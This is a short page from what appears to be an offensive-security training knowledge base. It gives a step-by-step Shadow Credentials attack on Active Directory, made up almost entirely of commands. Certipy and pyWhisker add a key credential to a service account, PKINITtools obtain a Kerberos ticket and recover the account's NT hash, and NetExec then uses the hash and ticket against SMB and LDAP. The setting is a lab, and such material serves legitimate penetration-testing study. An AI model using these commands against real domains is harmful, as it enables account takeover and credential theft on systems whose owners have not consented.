Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ACL Abuse / Shadow Credentials / Techniques

Linux

Set variables:

export DC=10.10.10.200
export DOMAIN=ootw.local

Automatic Certipy flow:

certipy shadow auto -u ben.carter@ootw.local -p 'StudentPass2026!' -account svc_web -dc-ip $DC

Validate recovered material:

nxc smb $DC -d $DOMAIN -u svc_web -H NTLM_HASH
nxc ldap $DC -d $DOMAIN -u svc_web -H NTLM_HASH

Manual pyWhisker and PKINITtools flow:

python3 pywhisker.py -d $DOMAIN -u ben.carter -p 'StudentPass2026!' --target svc_web --action add --filename svc_web
python3 gettgtpkinit.py -cert-pfx svc_web.pfx -pfx-pass PFX_PASSWORD $DOMAIN/svc_web svc_web.ccache
export KRB5CCNAME=svc_web.ccache
klist

Derive NT hash with the AS-REP encryption key printed by gettgtpkinit.py:

python3 getnthash.py -key AS_REP_KEY $DOMAIN/svc_web

Use the ticket:

export KRB5CCNAME=svc_web.ccache
nxc ldap $DC -k --use-kcache